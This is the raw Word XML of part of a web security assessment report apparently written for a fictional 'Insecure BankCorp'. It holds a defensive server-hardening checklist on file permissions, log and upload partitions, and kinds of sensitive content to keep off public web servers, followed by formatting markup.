    <w:p w14:paraId="5389DC8F" w14:textId="77777777" w:rsidR="008F5834" w:rsidRPr="008F5834" w:rsidRDefault="008F5834" w:rsidP="008F5834">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ADF36AC" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="008F5834" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify that all manufacturer documentation has been removed from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1041490B" w14:textId="77777777" w:rsidR="008F5834" w:rsidRDefault="008F5834" w:rsidP="008F5834">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339BD57B" w14:textId="77777777" w:rsidR="008F5834" w:rsidRPr="007D4857" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify that any example or test files from the server, including scripts and executable code, have been removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C59A925" w14:textId="77777777" w:rsidR="008F5834" w:rsidRPr="008F5834" w:rsidRDefault="008F5834" w:rsidP="008F5834">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16BAEC00" w14:textId="77777777" w:rsidR="008F5834" w:rsidRPr="007D4857" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005716AA">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Define a complete Web content access matrix. Identify which folders and files within the Web server document should be restricted and which should be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>accessible (and by whom).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFC83B5" w14:textId="77777777" w:rsidR="008F5834" w:rsidRPr="008F5834" w:rsidRDefault="008F5834" w:rsidP="008F5834">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41558A13" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="005716AA" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify that the following file-level controls are applied for the web application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099ED425" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="005716AA" w:rsidRDefault="0094295D" w:rsidP="0094295D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D3D4FBB" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="005716AA" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005716AA">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure the Web server so that Web content files can be read but not written by service processes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24288CEE" w14:textId="77777777" w:rsidR="000A743D" w:rsidRDefault="000A743D" w:rsidP="007D4857">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B351B0" w14:textId="77777777" w:rsidR="000A743D" w:rsidRPr="007D4857" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005716AA">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure the Web server so that service processes cannot write to the directories where public Web content is stored </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7451B4DC" w14:textId="77777777" w:rsidR="000A743D" w:rsidRDefault="000A743D" w:rsidP="000A743D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9459A6" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="005716AA" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005716AA">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure the Web server so that only processes authorized for Web server administration can write Web content files </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F402DB7" w14:textId="77777777" w:rsidR="000126B8" w:rsidRDefault="000126B8" w:rsidP="007D4857">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C269B6D" w14:textId="77777777" w:rsidR="000126B8" w:rsidRPr="007D4857" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005716AA">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Configure the host OS so that the Web server can write log files but not read them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10256530" w14:textId="77777777" w:rsidR="000126B8" w:rsidRPr="005716AA" w:rsidRDefault="000126B8" w:rsidP="000126B8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A7ABF2" w14:textId="77777777" w:rsidR="000126B8" w:rsidRPr="007D4857" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005716AA">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Configure the host OS so that temporary files created by the Web server application are restricted to a specified and appropriately protected subdirectory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7C1DA9" w14:textId="77777777" w:rsidR="000126B8" w:rsidRDefault="000126B8" w:rsidP="000126B8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108A9F75" w14:textId="77777777" w:rsidR="000126B8" w:rsidRPr="007D4857" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005716AA">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure the host OS so that access to any temporary files created by the Web server application is limited to the service processes that created the files </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311414C9" w14:textId="77777777" w:rsidR="000126B8" w:rsidRDefault="000126B8" w:rsidP="000126B8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6E2F38" w14:textId="77777777" w:rsidR="0094295D" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005716AA">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Install Web content on a different hard drive or logical partition than the OS and Web server application </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20166D22" w14:textId="77777777" w:rsidR="000A743D" w:rsidRDefault="000A743D" w:rsidP="000A743D">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17657983" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="005716AA" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005716AA">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If uploads are allowed to the Web server, configure it so that a limit is placed on the amount of hard drive space that is dedicated for this purpose; uploads should be placed on a separate partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF346FF" w14:textId="77777777" w:rsidR="000A743D" w:rsidRDefault="000A743D" w:rsidP="000A743D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F76526" w14:textId="77777777" w:rsidR="0094295D" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005716AA">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ensure that log files are stored in a location that is sized appropriately;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005716AA">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>log files should be placed on a separate partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF04BB5" w14:textId="77777777" w:rsidR="000126B8" w:rsidRDefault="000126B8" w:rsidP="0094295D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F951D9F" w14:textId="77777777" w:rsidR="0094295D" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify that sensitive content on a public web server is restricted for the following types of information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669E1F72" w14:textId="77777777" w:rsidR="0094295D" w:rsidRDefault="0094295D" w:rsidP="0094295D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B294B94" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00F415C8" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415C8">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Classified records </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A454D92" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00AD413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 xml:space="preserve">Internal personnel rules and procedures </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBDCDF4" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00AD413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 xml:space="preserve">Sensitive or proprietary information </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F92E368" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00AD413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 xml:space="preserve">Personal information about an organization’s personnel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612AD77C" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00AD4137" w:rsidRDefault="0094295D" w:rsidP="0094295D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4137">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Telephone numbers, e-mail addresses, or general listings of staff unless necessary to fulfill organizational requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43998D8F" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00AD413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 xml:space="preserve">Schedules of organizational principals or their exact location (whether on or off the premises) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D874CC" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00AD413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 xml:space="preserve">Information on the composition, preparation, or optimal use of hazardous materials or toxins </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05ABC0" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00AD413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Sensitive information relating to homeland security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A9F1F" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00AD413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 xml:space="preserve">Investigative records </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D72ED8" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00AD413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Financial records (beyond those already publicly available)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472CF25B" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00AD413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 xml:space="preserve">Medical records </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225A5764" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00AD413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 xml:space="preserve">Organization’s physical and information security procedures </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED751FE" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00AD413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 xml:space="preserve">Information about organization’s network and information system infrastructure </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25718618" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00AD413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 xml:space="preserve">Information that specifies or implies physical security vulnerabilities </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F321446" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00AD413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Plans, maps, diagrams, aerial photographs, and architectural plans of organizational building, properties, or installations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4074D5" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00AD413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Copyrighted material without the written permission of the owner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CEDA15" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="007D4857" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4137">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Privacy or security policies that indicate the types of security measures in place to the degree that they may be useful to an attacker </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0094295D" w:rsidRPr="007D4857" w:rsidSect="009936D9">
      <w:type w:val="continuous"/>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5D9E4" w14:textId="77777777" w:rsidR="009A5BBA" w:rsidRDefault="009A5BBA">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="54FF3C64" w14:textId="77777777" w:rsidR="009A5BBA" w:rsidRDefault="009A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IBMBodoniBELight">
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="LiberationSans">
    <w:altName w:val="Calibri"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="LiberationSans-Bold">
    <w:altName w:val="Calibri"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="var(--md-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92BF" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00FD5528">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2433C" w14:textId="77777777" w:rsidR="009A5BBA" w:rsidRDefault="009A5BBA">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5E4A7559" w14:textId="77777777" w:rsidR="009A5BBA" w:rsidRDefault="009A5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4323D" w14:textId="45B5C8ED" w:rsidR="006860F0" w:rsidRDefault="006860F0">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Web Security Assessment Report</w:t>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r w:rsidR="000B0D89">
      <w:t>Insecure</w:t>
    </w:r>
    <w:r w:rsidR="00EA5040">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="000B0D89">
      <w:t>BankCorp</w:t>
    </w:r>
    <w:r>
      <w:tab/>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7053D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="291EEC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7924BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7AAA4CA"/>
    <w:lvl w:ilvl="0" w:tplc="0409000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2A967705"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EAC2B5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07032C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EAA6A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5B640D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205FC"/>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6AD5145"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F8CA1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0B5380"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="502ABF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A5"/>
    <w:rsid w:val="000024CF"/>
    <w:rsid w:val="00002AE1"/>
    <w:rsid w:val="000046CA"/>
    <w:rsid w:val="00011C73"/>
    <w:rsid w:val="000126B8"/>
    <w:rsid w:val="00017164"/>
    <w:rsid w:val="000206B4"/>
    <w:rsid w:val="0002080A"/>
    <w:rsid w:val="0002448A"/>
    <w:rsid w:val="00024A36"/>
    <w:rsid w:val="000258AA"/>
    <w:rsid w:val="00025C90"/>
    <w:rsid w:val="000278CC"/>
    <w:rsid w:val="00033D01"/>
    <w:rsid w:val="0003580B"/>
    <w:rsid w:val="00037417"/>
    <w:rsid w:val="00040DEC"/>
    <w:rsid w:val="00042481"/>
    <w:rsid w:val="000426E9"/>
    <w:rsid w:val="000428D4"/>
    <w:rsid w:val="000433E4"/>
    <w:rsid w:val="000457C1"/>
    <w:rsid w:val="00052ED4"/>
    <w:rsid w:val="000530DF"/>
    <w:rsid w:val="00056063"/>
    <w:rsid w:val="000606C4"/>
    <w:rsid w:val="00061707"/>
    <w:rsid w:val="00062659"/>
    <w:rsid w:val="000631A3"/>
    <w:rsid w:val="000647D8"/>
    <w:rsid w:val="000729BF"/>
    <w:rsid w:val="000753CF"/>
    <w:rsid w:val="0008285A"/>
    <w:rsid w:val="00083779"/>
    <w:rsid w:val="00083ED4"/>
    <w:rsid w:val="00094F9D"/>
    <w:rsid w:val="000951BF"/>
    <w:rsid w:val="00095EF6"/>
    <w:rsid w:val="000A11CF"/>
    <w:rsid w:val="000A251E"/>
    <w:rsid w:val="000A743D"/>
    <w:rsid w:val="000B007A"/>
    <w:rsid w:val="000B0D89"/>
    <w:rsid w:val="000B1DF0"/>
    <w:rsid w:val="000B5C9E"/>
    <w:rsid w:val="000B6B8C"/>
    <w:rsid w:val="000B6F3C"/>
    <w:rsid w:val="000C1C85"/>
    <w:rsid w:val="000C5A83"/>
    <w:rsid w:val="000D2342"/>
    <w:rsid w:val="000D26F5"/>
    <w:rsid w:val="000D280E"/>
    <w:rsid w:val="000D46F8"/>
    <w:rsid w:val="000D5A7C"/>
    <w:rsid w:val="000D7F52"/>
    <w:rsid w:val="000E3590"/>
    <w:rsid w:val="000E7769"/>
    <w:rsid w:val="000F1CC0"/>
    <w:rsid w:val="000F3C7D"/>
    <w:rsid w:val="00102FA0"/>
    <w:rsid w:val="00104D89"/>
    <w:rsid w:val="00105F97"/>
    <w:rsid w:val="001074D2"/>
